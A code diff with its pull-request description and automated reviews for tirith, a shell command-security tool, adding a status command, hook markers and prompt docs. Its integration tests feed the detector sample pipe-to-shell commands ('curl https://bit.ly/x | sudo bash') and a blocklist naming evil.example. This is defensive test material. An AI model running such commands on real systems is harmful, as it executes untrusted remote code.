+++ b/crates/tirith/tests/cli_integration.rs
@@ -8017,7 +8017,7 @@ fn init_prompt_status_emits_marker_wrapped_snippet_zsh() {
         "zsh snippet must set PROMPT_SUBST; got: {stdout}"
     );
     assert!(
-        stdout.contains("'$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '"),
+        stdout.contains("'$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '"),
         "zsh snippet must single-quote the command substitution and forward the \
          non-exported TIRITH_STATUS; got: {stdout}"
     );
@@ -8063,7 +8063,7 @@ fn init_prompt_status_is_idempotent_when_run_twice() {
 
     // The PS1 / PROMPT wrap-line must also appear exactly once.
     let prompt_line =
-        "PROMPT='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PROMPT\"";
+        "PROMPT='$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '\"$PROMPT\"";
     assert_eq!(
         stdout_a.matches(prompt_line).count(),
         1,
@@ -8090,7 +8090,7 @@ fn init_prompt_status_supports_bash_and_fish_and_powershell() {
     for (shell, must_contain) in [
         (
             "bash",
-            "PS1='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PS1\"",
+            "PS1='$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '\"$PS1\"",
         ),
         ("fish", "function fish_right_prompt"),
         ("powershell", "function global:prompt"),

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -14340,3 +14340,160 @@ fn lsp_stdio_initialize_didopen_didchange_lifecycle() {
         }
     }
 }
+
+// ---------------------------------------------------------------------------
+// UX / transparency pass (feat/ux-transparency-pass)
+// ---------------------------------------------------------------------------
+
+#[test]
+fn status_exits_zero_when_guarded() {
+    let out = tirith()
+        .env("TIRITH_STATUS", "blocks")
+        .args(["status"])
+        .output()
+        .expect("run status");
+    assert_eq!(out.status.code(), Some(0), "guarded protection must exit 0");
+}
+
+#[test]
+fn status_exits_nonzero_when_not_guarded() {
+    for mode in ["warn-only", "off"] {
+        let out = tirith()
+            .env("TIRITH_STATUS", mode)
+            .args(["status"])
+            .output()
+            .expect("run status");
+        assert_ne!(
+            out.status.code(),
+            Some(0),
+            "non-guarded protection ({mode}) must exit non-zero"
+        );
+    }
+    let out = tirith()
+        .env_remove("TIRITH_STATUS")
+        .args(["status"])
+        .output()
+        .expect("run status");
+    assert_ne!(
+        out.status.code(),
+        Some(0),
+        "unset TIRITH_STATUS must exit non-zero"
+    );
+}
+
+#[test]
+fn prompt_status_always_exits_zero() {
+    // prompt-status feeds $PS1 and must never fail the prompt, even unset.
+    let out = tirith()
+        .env_remove("TIRITH_STATUS")
+        .args(["prompt-status"])
+        .output()
+        .expect("run prompt-status");
+    assert_eq!(
+        out.status.code(),
+        Some(0),
+        "prompt-status must always exit 0"
+    );
+}
+
+#[test]
+fn check_clean_prints_no_issues_directly() {
+    let out = tirith()
+        .env_remove("_TIRITH_HOOK")
+        .env_remove("_TIRITH_BASH_INTERNAL")
+        .args(["check", "--shell", "posix", "--", "ls -la"])
+        .output()
+        .expect("run check");
+    assert_eq!(out.status.code(), Some(0));
+    let err = String::from_utf8_lossy(&out.stderr);
+    assert!(
+        err.contains("no issues"),
+        "a clean direct `check` prints 'no issues'; stderr: {err}"
+    );
+}
+
+#[test]
+fn check_clean_is_silent_from_a_hook() {
+    let out = tirith()
+        .env("_TIRITH_HOOK", "1")
+        .args(["check", "--shell", "posix", "--", "ls -la"])
+        .output()
+        .expect("run check");
+    let err = String::from_utf8_lossy(&out.stderr);
+    assert!(
+        !err.contains("no issues"),
+        "a hook-invoked clean `check` must stay silent; stderr: {err}"
+    );
+}
+
+#[test]
+fn check_clean_is_silent_under_quiet() {
+    let out = tirith()
+        .env_remove("_TIRITH_HOOK")
+        .env_remove("_TIRITH_BASH_INTERNAL")
+        .args(["check", "--quiet", "--shell", "posix", "--", "ls -la"])
+        .output()
+        .expect("run check");
+    let err = String::from_utf8_lossy(&out.stderr);
+    assert!(
+        !err.contains("no issues"),
+        "--quiet suppresses the clean line; stderr: {err}"
+    );
+}
+
+#[test]
+fn check_reads_command_from_piped_stdin() {
+    use std::io::Write as _;
+    use std::process::Stdio;
+    let mut child = tirith()
+        .args(["check", "--shell", "posix"])
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped())
+        .spawn()
+        .expect("spawn check");
+    child
+        .stdin
+        .take()
+        .expect("stdin")
+        .write_all(b"curl https://bit.ly/x | sudo bash")
+        .expect("write stdin");
+    let out = child.wait_with_output().expect("wait check");
+    let err = String::from_utf8_lossy(&out.stderr);
+    assert!(
+        err.contains("shortened_url") || err.contains("curl_pipe_shell"),
+        "check must analyze a command piped on stdin; stderr: {err}"
+    );
+}
+
+#[test]
+fn policy_validate_accepts_a_positional_path() {
+    let dir = tempfile::tempdir().unwrap();
+    let p = dir.path().join("policy.yaml");
+    fs::write(&p, "fail_mode: open\nblocklist:\n  - evil.example\n").unwrap();
+    let out = tirith()
+        .args(["policy", "validate", p.to_str().unwrap()])
+        .output()
+        .expect("run policy validate");
+    assert_eq!(
+        out.status.code(),
+        Some(0),
+        "a valid policy via positional path validates; stderr: {}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+}
+
+#[test]
+fn fix_on_non_tty_prints_rerun_hint() {
+    // Item 14d (pre-existing): the non-interactive `tirith fix` path must surface
+    // the rerun hint so a piped user knows how to capture suggestions.
+    let out = tirith()
+        .args(["fix", "curl https://bit.ly/x | bash"])
+        .output()
+        .expect("run fix");
+    let err = String::from_utf8_lossy(&out.stderr);
+    assert!(
+        err.contains("--non-interactive") && err.contains("--json"),
+        "fix on a non-TTY prints the rerun hint; stderr: {err}"
+    );
+}

--- a/docs/doctor-modes.md
+++ b/docs/doctor-modes.md
@@ -52,7 +52,7 @@ The JSON object is intentionally minimal and stable — exactly these fields:
 | field             | type             | meaning                                                                                                                                                                                                       |
 | ----------------- | ---------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
 | `schema_version`  | integer          | Version of this payload's shape. Currently `1`. Bumped only on a breaking change to the field set or meaning.                                                                                                  |
-| `protection_mode` | string           | Live protection mode derived from the hook-exported `TIRITH_STATUS`. One of `guarded`, `warn-only`, `degraded`, or `off`. An unrecognized status value is passed through verbatim for forward compatibility.   |
+| `protection_mode` | string           | Live protection mode. `doctor --quick` is an external process, so it reads the hook-EXPORTED `TIRITH_BASH_EFFECTIVE_PROTECTION` first (the bash hook re-exports it for exactly this reason) and falls back to `TIRITH_STATUS`, which the hooks deliberately leave non-exported. One of `guarded`, `warn-only`, `degraded`, or `off`; an unrecognized value is passed through verbatim. (`off` here can also mean "a configured hook whose live mode this external process cannot see" — `tirith status` reports that case as still-protected.) |
 | `policy_path_used`| string or `null` | The single policy file the engine would load for the current directory, or `null` when none is discovered. Existence-based discovery only — never a network fetch.                                            |
 | `hook_configured` | boolean          | Whether the tirith shell hook is configured in the detected shell's profile.                                                                                                                                   |
 
@@ -70,14 +70,16 @@ Example:
 ### `protection_mode` values
 
 `protection_mode` uses the same vocabulary as `tirith prompt-status` (see
-`docs/prompt-integration.md`), derived from `TIRITH_STATUS`:
+`docs/prompt-integration.md`), derived from the hook's effective-protection
+signal — `TIRITH_BASH_EFFECTIVE_PROTECTION` first, falling back to
+`TIRITH_STATUS`. Both carry the same value set:
 
-| `TIRITH_STATUS`     | `protection_mode` | meaning                                            |
+| hook signal value   | `protection_mode` | meaning                                            |
 | ------------------- | ----------------- | -------------------------------------------------- |
 | `blocks`            | `guarded`         | A dangerous command is stopped before it runs.     |
 | `warn-only`         | `warn-only`       | Commands are checked but not blocked.              |
 | `degraded`          | `degraded`        | Protection was downgraded to warn-only this session.|
-| `off`, empty, unset | `off`             | No tirith hook ran in this process / protection off.|
+| `off`, empty, unset | `off`             | No live mode visible to this external process / protection off.|
 | (any other value)   | (verbatim)        | Forwarded unchanged for forward compatibility.     |
 
 `protection_mode` reflects the live hook state of the process that invoked

--- a/docs/prompt-integration.md
+++ b/docs/prompt-integration.md
@@ -61,31 +61,42 @@ etc.) prevents double-wrapping if your rc file is re-sourced.
 ```zsh
 # ~/.zshrc
 setopt PROMPT_SUBST
-PROMPT='$(tirith prompt-status --short) '"$PROMPT"
+PROMPT='$(TIRITH_STATUS="$TIRITH_STATUS" tirith prompt-status --short) '"$PROMPT"
 ```
 
-**Use single quotes** around `$(tirith prompt-status --short)`. With
-double quotes, the command substitution happens once when `PROMPT` is
-assigned — your prompt then shows a frozen status. With single quotes
-zsh defers the substitution to prompt-render time.
+**Use single quotes** around the substitution. With double quotes, the
+command substitution happens once when `PROMPT` is assigned — your prompt
+then shows a frozen status. With single quotes zsh defers the substitution
+to prompt-render time.
+
+**Forward `TIRITH_STATUS`.** The shell hooks expose the live status as a
+deliberately NON-exported variable, so a bare `tirith prompt-status` child
+process cannot see it (it would always show `off`). The
+`TIRITH_STATUS="$TIRITH_STATUS"` prefix passes it into the child for that one
+call without exporting it session-wide.
 
 ### bash
 
 ```bash
 # ~/.bashrc
-PS1='$(tirith prompt-status --short) '"$PS1"
+PS1='$(TIRITH_STATUS="$TIRITH_STATUS" tirith prompt-status --short) '"$PS1"
 ```
 
-Same quoting rule as zsh: single quotes around the substitution.
+Same rules as zsh: single quotes around the substitution, and the
+`TIRITH_STATUS="$TIRITH_STATUS"` prefix to forward the hook's non-exported
+status into the child.
 
 ### fish
 
 ```fish
 # ~/.config/fish/config.fish
 function fish_right_prompt
-    tirith prompt-status --short
+    env TIRITH_STATUS="$TIRITH_STATUS" tirith prompt-status --short
 end
 ```
+
+The `env TIRITH_STATUS="$TIRITH_STATUS"` prefix forwards the hook's
+non-exported status into the child (fish has no bare `VAR=val cmd` form).
 
 The right prompt keeps tirith's status out of the way of your main
 prompt. If you'd rather have it on the left, override `fish_prompt`
@@ -96,7 +107,12 @@ instead and prepend the substitution.
 ```powershell
 # $PROFILE
 function global:prompt {
-    $line = (& tirith prompt-status --short) 2>$null
+    # The hook stores $global:TIRITH_STATUS (a PowerShell variable, not $env:),
+    # which a child process cannot see — forward it via $env: for this one call,
+    # restored in finally so it does not leak into the session.
+    $prev = $env:TIRITH_STATUS; $env:TIRITH_STATUS = $global:TIRITH_STATUS
+    try { $line = (& tirith prompt-status --short) 2>$null }
+    finally { if ($null -eq $prev) { Remove-Item Env:\TIRITH_STATUS -ErrorAction SilentlyContinue } else { $env:TIRITH_STATUS = $prev } }
     "$line PS $($executionContext.SessionState.Path.CurrentLocation)> "
 }
 ```

--- a/docs/prompt-integration.md
+++ b/docs/prompt-integration.md
@@ -35,9 +35,12 @@ $ tirith prompt-status --json
 
 The JSON envelope is the stable interface — `schema_version` is pinned
 at `1` and additive fields are allowed without bumping it; structural
-changes will bump the version. Use the JSON form from external prompt
-renderers (Starship, oh-my-zsh themes) that want to do their own
-formatting.
+changes will bump the version. An in-shell wrapper that already forwards
+`TIRITH_STATUS` (the snippets below) can parse the JSON form for its own
+formatting. Note that a fully **external** renderer that shells out as a
+separate process (Starship) cannot see the non-exported `TIRITH_STATUS` and
+would read `off` regardless of output format — see the
+[Starship](#starship) section for the export-based approach it needs.
 
 ## Auto-install (recommended)
 

--- a/docs/prompt-integration.md
+++ b/docs/prompt-integration.md
@@ -61,7 +61,7 @@ etc.) prevents double-wrapping if your rc file is re-sourced.
 ```zsh
 # ~/.zshrc
 setopt PROMPT_SUBST
-PROMPT='$(TIRITH_STATUS="$TIRITH_STATUS" tirith prompt-status --short) '"$PROMPT"
+PROMPT='$(TIRITH_STATUS="${TIRITH_STATUS:-}" tirith prompt-status --short) '"$PROMPT"
 ```
 
 **Use single quotes** around the substitution. With double quotes, the
@@ -72,19 +72,21 @@ to prompt-render time.
 **Forward `TIRITH_STATUS`.** The shell hooks expose the live status as a
 deliberately NON-exported variable, so a bare `tirith prompt-status` child
 process cannot see it (it would always show `off`). The
-`TIRITH_STATUS="$TIRITH_STATUS"` prefix passes it into the child for that one
-call without exporting it session-wide.
+`TIRITH_STATUS="${TIRITH_STATUS:-}"` prefix passes it into the child for that one
+call without exporting it session-wide. The `${VAR:-}` form (rather than bare
+`$VAR`) keeps the prompt safe under `set -u` / `setopt NO_UNSET` when the hook
+has not set the variable yet.
 
 ### bash
 
 ```bash
 # ~/.bashrc
-PS1='$(TIRITH_STATUS="$TIRITH_STATUS" tirith prompt-status --short) '"$PS1"
+PS1='$(TIRITH_STATUS="${TIRITH_STATUS:-}" tirith prompt-status --short) '"$PS1"
 ```
 
 Same rules as zsh: single quotes around the substitution, and the
-`TIRITH_STATUS="$TIRITH_STATUS"` prefix to forward the hook's non-exported
-status into the child.
+`TIRITH_STATUS="${TIRITH_STATUS:-}"` prefix to forward the hook's non-exported
+status into the child (the `${VAR:-}` form is `set -u`-safe).
 
 ### fish
 
@@ -122,20 +124,29 @@ prefix its output rather than replacing it.
 
 ### nushell
 
-Nushell doesn't have an `eval`-able prompt-wrapper, so the auto-install
-path emits a doc pointer. Wire it manually:
+The nushell hook **deliberately exposes no `TIRITH_STATUS` variable**: every
+nushell `$env` entry is exported (inherited by child processes), and nushell
+has no non-exported session variable a prompt closure could read, so there is
+no safe way to surface a live status. A `tirith prompt-status` call in a
+nushell prompt would therefore always print `off`. nushell protection is
+warn-only regardless — see the nushell note in `docs/prompt-status.md`. If you
+just want a plain prompt, render `$env.PWD` directly without a tirith segment:
 
 ```nu
 # ~/.config/nushell/config.nu
-$env.PROMPT_COMMAND = {|| $"(tirith prompt-status --short) ($env.PWD)> "}
+$env.PROMPT_COMMAND = {|| $"($env.PWD)> "}
 ```
 
 ### Starship
 
-Starship runs as a separate process and doesn't share the parent
-shell's `TIRITH_STATUS` non-exported variable. For starship users,
-invoke `tirith prompt-status --json` from a starship custom module and
-template the fields you care about.
+Starship is an **external** renderer: it shells out to a separate child
+process each prompt, which cannot read the hook's non-exported
+`TIRITH_STATUS`. So a Starship `custom` module that runs `tirith
+prompt-status` would always show `off`. To surface the status in Starship you
+must opt back into **exporting** the variable yourself (accepting that child
+processes then inherit it) and read it directly — `export TIRITH_STATUS` after
+the hook is sourced, then `command = "echo $TIRITH_STATUS"`. The full Starship
+recipe (with the `custom` module TOML) is in `docs/prompt-status.md`.
 
 ## Latency
 

--- a/shell/lib/fish-hook.fish
+++ b/shell/lib/fish-hook.fish
@@ -145,7 +145,7 @@ if functions -q fish_clipboard_paste; and not functions -q _tirith_original_fish
         end
 
         set -l tmpfile (mktemp)
-        echo -n "$content" | command tirith paste --shell fish --interactive >$tmpfile 2>&1
+        echo -n "$content" | env _TIRITH_HOOK=1 command tirith paste --shell fish --interactive >$tmpfile 2>&1
         set -l rc $status
         set -l output (string collect < $tmpfile)
         command rm -f $tmpfile
@@ -193,7 +193,7 @@ function _tirith_check_command
     # and command substitution (set -l x (cmd)) can hang in that context.
     set -l outfile (mktemp)
     set -l errfile (mktemp)
-    command tirith check --approval-check --non-interactive --interactive --shell fish -- "$cmd" >$outfile 2>$errfile
+    env _TIRITH_HOOK=1 command tirith check --approval-check --non-interactive --interactive --shell fish -- "$cmd" >$outfile 2>$errfile
     set -l rc $status
     # Read stdout lines: line 1 = approval path, line 2 = warn-ack path (exit code 3 only)
     set -l approval_path ""

--- a/shell/lib/nushell-hook.nu
+++ b/shell/lib/nushell-hook.nu
@@ -62,7 +62,7 @@ if (($nu.is-interactive) and (not ('_TIRITH_NU_LOADED' in $env))) {
 
             $env._TIRITH_NU_RUNNING = true
             try {
-                let result = (do { ^tirith check --non-interactive --interactive --shell posix -- $cmd } | complete)
+                let result = (with-env {_TIRITH_HOOK: "1"} { do { ^tirith check --non-interactive --interactive --shell posix -- $cmd } | complete })
                 $env._TIRITH_NU_RUNNING = false
 
                 if $result.exit_code != 0 {

--- a/shell/lib/powershell-hook.ps1
+++ b/shell/lib/powershell-hook.ps1
@@ -204,9 +204,14 @@ Set-PSReadLineKeyHandler -Key Enter -ScriptBlock {
 
     # Run tirith check with approval workflow (stdout=approval file path, stderr=human output)
     $errfile = [System.IO.Path]::GetTempFileName()
+    $prevHook = $env:_TIRITH_HOOK
     $env:_TIRITH_HOOK = '1'
-    $approvalPath = & tirith check --approval-check --non-interactive --interactive --shell powershell -- $line 2>$errfile
-    $rc = $LASTEXITCODE
+    try {
+        $approvalPath = & tirith check --approval-check --non-interactive --interactive --shell powershell -- $line 2>$errfile
+        $rc = $LASTEXITCODE
+    } finally {
+        if ($null -eq $prevHook) { Remove-Item Env:\_TIRITH_HOOK -ErrorAction SilentlyContinue } else { $env:_TIRITH_HOOK = $prevHook }
+    }
     $output = Get-Content $errfile -Raw -ErrorAction SilentlyContinue
     Remove-Item $errfile -Force -ErrorAction SilentlyContinue
 
@@ -324,9 +329,14 @@ Set-PSReadLineKeyHandler -Key Ctrl+v -ScriptBlock {
 
     # Check with tirith paste, use temp file to prevent output leakage
     $tmpfile = [System.IO.Path]::GetTempFileName()
+    $prevHook = $env:_TIRITH_HOOK
     $env:_TIRITH_HOOK = '1'
-    $pasted | & tirith paste --shell powershell --interactive > $tmpfile 2>&1
-    $rc = $LASTEXITCODE
+    try {
+        $pasted | & tirith paste --shell powershell --interactive > $tmpfile 2>&1
+        $rc = $LASTEXITCODE
+    } finally {
+        if ($null -eq $prevHook) { Remove-Item Env:\_TIRITH_HOOK -ErrorAction SilentlyContinue } else { $env:_TIRITH_HOOK = $prevHook }
+    }
     $output = Get-Content $tmpfile -Raw -ErrorAction SilentlyContinue
     Remove-Item $tmpfile -Force -ErrorAction SilentlyContinue
 

--- a/shell/lib/powershell-hook.ps1
+++ b/shell/lib/powershell-hook.ps1
@@ -204,6 +204,7 @@ Set-PSReadLineKeyHandler -Key Enter -ScriptBlock {
 
     # Run tirith check with approval workflow (stdout=approval file path, stderr=human output)
     $errfile = [System.IO.Path]::GetTempFileName()
+    $env:_TIRITH_HOOK = '1'
     $approvalPath = & tirith check --approval-check --non-interactive --interactive --shell powershell -- $line 2>$errfile
     $rc = $LASTEXITCODE
     $output = Get-Content $errfile -Raw -ErrorAction SilentlyContinue
@@ -323,6 +324,7 @@ Set-PSReadLineKeyHandler -Key Ctrl+v -ScriptBlock {
 
     # Check with tirith paste, use temp file to prevent output leakage
     $tmpfile = [System.IO.Path]::GetTempFileName()
+    $env:_TIRITH_HOOK = '1'
     $pasted | & tirith paste --shell powershell --interactive > $tmpfile 2>&1
     $rc = $LASTEXITCODE
     $output = Get-Content $tmpfile -Raw -ErrorAction SilentlyContinue

--- a/shell/lib/zsh-hook.zsh
+++ b/shell/lib/zsh-hook.zsh
@@ -138,7 +138,7 @@ _tirith_accept_line() {
   # Run tirith check with approval workflow (stdout=approval file path, stderr=human output)
   local errfile=$(mktemp)
   local approval_path
-  approval_path=$(command tirith check --approval-check --non-interactive --interactive --shell posix -- "$buf" 2>"$errfile")
+  approval_path=$(_TIRITH_HOOK=1 command tirith check --approval-check --non-interactive --interactive --shell posix -- "$buf" 2>"$errfile")
   local rc=$?
   local output=$(<"$errfile")
   command rm -f "$errfile"
@@ -264,7 +264,7 @@ _tirith_bracketed_paste() {
   if [[ -n "$pasted" ]]; then
     # Pipe pasted content to tirith paste, use temp file to prevent tty leakage
     local tmpfile=$(mktemp)
-    echo -n "$pasted" | command tirith paste --shell posix --interactive >"$tmpfile" 2>&1
+    echo -n "$pasted" | _TIRITH_HOOK=1 command tirith paste --shell posix --interactive >"$tmpfile" 2>&1
     local rc=$?
     local output=$(<"$tmpfile")
     command rm -f "$tmpfile"


### PR DESCRIPTION
## Summary

A CLI transparency + safety-UX pass surfaced by dogfooding v0.3.2 as a user. **The detection engine is untouched** — these are presentation, discoverability, and fail-loud improvements (14 items). Stacked on `fix/security-audit-findings`; merge after it.

## The two that matter most (security UX)

- **Degraded protection is now loud.** `tirith status` is the canonical "am I protected?" command and exits **non-zero** unless the hook is actively blocking, so a silent block→warn degrade is catchable in a prompt guard or CI. `prompt-status` and `doctor --quick` stay exit-0 (poller contracts).
- **F9 neutralization is now visible.** A repo-scoped policy's ignored weakening fields are recorded (`Policy.neutralized_fields`, a `#[serde(skip)]` bookkeeping vector) and surfaced by `tirith policy effective` plus a once-per-session notice — a repo author no longer sets `allowlist` and watches it silently do nothing.

## All 14

| Area | Items |
|---|---|
| Safety UX | `tirith status` (+ exit-code contract); `doctor --fix` (safe-mode reset + shadow guidance); `check` reads piped stdin + prints "no issues" on a clean direct run; global `--quiet` / `TIRITH_QUIET` |
| Policy transparency | `policy effective`; session-scoped weakening notice; `policy validate <path>` positional |
| CLI polish | `daemon start --detach` (startup-verified); categorized `--help`; `hooks explain` name-or-path; cloaking fast-fail; shadow-warning throttle |
| Block moment | specific-URL "to allow" trust line; `trust from-last-trigger`; blast-radius header; onboard `--apply` hint |

## Notes for review

- `--quiet` is two-tier: it suppresses low-value noise but **never** errors, verdicts, JSON, or the degraded/F9 security notices.
- The clean `check` line is gated on a hook marker (`_TIRITH_HOOK` / `_TIRITH_BASH_INTERNAL`) added to every shell hook **and** its embedded copy, so it never spams the hook path (bash already set the marker).
- `blast_radius::cheap_check` already runs in the engine exec path; the block header just summarizes the existing destructive findings (no re-run).
- The "once-per-session" notice is keyed by `resolve_session_id()` (re-warns in new shells), not file mtime.
- Help grouping uses `after_long_help` + a clap-introspection drift test — clap-derive has no per-subcommand `help_heading`.
- `policy effective` is discovery-only (`discover_local_only`) — a transparency command must never hang on a remote fetch.

## Verification

- `cargo build/clippy/fmt` — clean.
- `cargo test --workspace` — **4323 passed**; the only 4 failures are pre-existing env-specific flakes that fail identically on the base branch.
- Dogfooded end-to-end: `status` exit codes, `policy effective` F9 transparency, `check` stdin/clean/hook-gating, `daemon --detach`, `trust from-last-trigger`, positional `policy validate`, the categorized `--help`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)



<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Added `tirith status` (JSON/human) showing protection posture and threat-db details.
  * Added `tirith policy effective` to view resolved policy and recorded neutralized fields.
  * Added `tirith trust from-last-trigger` to suggest/apply targeted trust entries.
  * `daemon start` supports `--detach` with verified background startup.
  * `check` accepts piped stdin (capped) and hooks no longer get a “no issues” note.

* **Bug Fixes**
  * Safer network error handling for cloaking checks; improved advisory rendering and safe quoting.

* **Docs**
  * Updated prompt and doctor docs; shell hooks now mark internal calls for correct behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR delivers 14 developer-experience improvements across the tirith CLI: a `tirith status` command with JSON contract and exit-code semantics, `tirith trust from-last-trigger` for one-shot trust suggestion/apply, `tirith policy effective` showing the resolved policy with neutralized fields, piped-stdin support for `tirith check`, `--quiet` global flag, `daemon start --detach`, and a rolling `threatdb-latest` release channel.

- **Security hardening**: `output.rs::write_block_advisories` (b35ad27) adds a `sanitized == url` guard before emitting shell-quoted trust commands; `format_add_line` in `trust.rs` applies the same scrubbing but is missing this guard — a ZWS-carrying URL produces a suggestion for a different domain than what was blocked.
- **Transparency infrastructure**: `warn_repo_policy_neutralized` fires a once-per-session F9 notice when a repo-scoped policy had weakening fields stripped; the notice is silently suppressed when `state_dir()` returns `None` (CI containers without XDG state).
- **Exit-code / JSON contract**: `tirith status --json` emits `"protected": false` for `ConfiguredUnknown` even though `exit_code()` returns 0, creating an apparent contradiction for CI consumers parsing the boolean field.

<h3>Confidence Score: 4/5</h3>

Safe to merge after fixing the missing `scrubbed != target` guard in `format_add_line`; P2 items are non-blocking.

One P1 defect in trust.rs (missing ZWS guard present in output.rs causes trust suggestions for the wrong domain). Two P2 items: silent suppression of the F9 neutralized-policy notice in stateless environments, and the `protected: false` / exit-0 contradiction in status.rs JSON. No P0s. Score capped at 4 by the P1.

`crates/tirith/src/cli/trust.rs` (P1 — missing sanitization guard in `format_add_line`); `crates/tirith/src/cli/mod.rs` and `crates/tirith/src/cli/status.rs` for the P2 items.

<h3>Important Files Changed</h3>




| Filename | Overview |
|----------|----------|
| crates/tirith/src/cli/trust.rs | Adds `format_add_line`, `suggest_lines`, `extract_target_rule_pairs`, `from_last_trigger`; missing `scrubbed != target` guard (present in output.rs) means ZWS-injected URLs produce trust suggestions for the wrong domain. |
| crates/tirith/src/cli/mod.rs | Adds `QUIET` OnceLock, `read_stdin_capped`, `warn_repo_policy_neutralized` (throttled security notice); early return on `state_dir() == None` silently suppresses the warning in stateless CI environments. |
| crates/tirith/src/cli/status.rs | New `tirith status` command with JSON contract; `protected: false` for `ConfiguredUnknown` despite exit 0 creates a detectable contradiction for CI consumers parsing the JSON field. |
| crates/tirith-core/src/output.rs | Adds `redact_suggestion`, blast-radius header, `sanitized == url` fallback guard (b35ad27 fix), and shell-quoting in `write_block_advisories`; tests cover ZWS regression and shell-injection. |
| crates/tirith-core/src/policy.rs | Adds `neutralized_fields: Vec<&'static str>` (serde skip) and `record!` macro population in `sanitize_repo_scoped`; `allow_bypass_env` deliberately excluded per design. |
| crates/tirith-core/src/rules/cloaking.rs | Adds `FetchErr` enum (`Connect`/`Other`), `classify_reqwest_err` mapping; empty baseline now returns `Err` (inconclusive) rather than false-negative `Ok { cloaking_detected: false }`. |
| crates/tirith/src/cli/daemon.rs | Adds `start_detached()` with pre-spawn guard, stale socket removal, `setsid()` via `pre_exec`, and `poll_startup()` (20x100ms) with SocketUp/ChildExited/PollError/TimedOut arms. |
| crates/tirith/src/cli/prompt_status.rs | New `ProtectionHealth` enum with `classify()` and `exit_code()`; Guarded/ConfiguredUnknown→0, all others→1; exit-code contract is documented and well-tested. |
| crates/tirith/src/cli/check.rs | Adds piped-stdin support before the empty-cmd check; "no issues" advisory gated on absence of `_TIRITH_HOOK` / `_TIRITH_BASH_INTERNAL` to avoid noise in hook context. |
| crates/tirith/src/main.rs | Adds `COMMANDS_BY_CATEGORY`, `--quiet` global flag, `Status` command, `FromLastTrigger` trust subcommand, `Effective` policy subcommand, positional `path_pos` for `policy validate`. |

</details>



<h3>Sequence Diagram</h3>

```mermaid
sequenceDiagram
    participant Shell as Shell Hook
    participant Check as tirith check
    participant Output as output.rs
    participant Trust as trust.rs
    participant Policy as policy.rs

    Shell->>Check: "_TIRITH_HOOK=1 tirith check cmd"
    Check->>Check: read_stdin_capped(max) — fails closed if oversized
    Check->>Output: write_block_advisories(findings)
    Output->>Output: sanitize_text_str(url) → scrubbed
    alt "scrubbed == url"
        Output->>Shell: tirith trust add url (shell_single_quote)
    else "scrubbed != url (ZWS stripped)"
        Output->>Shell: "# trust this target manually (fallback)"
    end

    Shell->>Trust: tirith trust from-last-trigger
    Trust->>Trust: format_add_line(target, rule_id)
    Trust->>Trust: sanitize_text_str(target) → scrubbed
    Note over Trust: Missing scrubbed != target guard
    Trust->>Shell: tirith trust add scrubbed (may be wrong domain)

    Shell->>Policy: tirith policy effective
    Policy->>Policy: gather_effective() → neutralized_fields
    Policy->>Shell: print resolved + neutralized fields

    Check->>Policy: warn_repo_policy_neutralized(policy)
    alt state_dir() is Some
        Policy->>Policy: write throttle marker
        Policy->>Shell: eprintln! F9 notice
    else state_dir() is None
        Policy->>Policy: return (silent — notice suppressed)
    end
```

<!-- greptile_failed_comments -->
<details><summary><h3>Comments Outside Diff (2)</h3></summary>

1. `crates/tirith-core/src/repo_hooks.rs`, line 644-647 ([link](https://github.com/sheeki03/tirith/blob/910548a38cf265876025b786bc633d1c070a27e7/crates/tirith-core/src/repo_hooks.rs#L644-L647)) 

   <a href="#"><img alt="P2" src="https://greptile-static-assets.s3.amazonaws.com/badges/p2.svg?v=9" align="top"></a> **`ends_with(query)` can match a partial filename suffix**

   The last branch `disp.ends_with(query)` (without requiring a preceding `/`) can produce false-positive matches. For example, a user passing `"commit"` as the query would match `.git/hooks/pre-commit` because the path string ends with the substring `"commit"`. The `ends_with(&format!("/{query}"))` guard two lines up already handles the intended "path fragment" case; the bare `ends_with(query)` adds ambiguous substring matches.

   <a href="https://app.greptile.com/ide/claude-code?prompt=This%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20crates%2Ftirith-core%2Fsrc%2Frepo_hooks.rs%0ALine%3A%20644-647%0A%0AComment%3A%0A**%60ends_with%28query%29%60%20can%20match%20a%20partial%20filename%20suffix**%0A%0AThe%20last%20branch%20%60disp.ends_with%28query%29%60%20%28without%20requiring%20a%20preceding%20%60%2F%60%29%20can%20produce%20false-positive%20matches.%20For%20example%2C%20a%20user%20passing%20%60%22commit%22%60%20as%20the%20query%20would%20match%20%60.git%2Fhooks%2Fpre-commit%60%20because%20the%20path%20string%20ends%20with%20the%20substring%20%60%22commit%22%60.%20The%20%60ends_with%28%26format!%28%22%2F%7Bquery%7D%22%29%29%60%20guard%20two%20lines%20up%20already%20handles%20the%20intended%20%22path%20fragment%22%20case%3B%20the%20bare%20%60ends_with%28query%29%60%20adds%20ambiguous%20substring%20matches.%0A%0AHow%20can%20I%20resolve%20this%3F%20If%20you%20propose%20a%20fix%2C%20please%20make%20it%20concise.&repo=sheeki03%2Ftirith&pr=139&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaudeDark.svg?v=3"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3"><img alt="Fix in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3" height="20"></picture></a>

2. `crates/tirith/src/cli/status.rs`, line 604-613 ([link](https://github.com/sheeki03/tirith/blob/910548a38cf265876025b786bc633d1c070a27e7/crates/tirith/src/cli/status.rs#L604-L613)) 

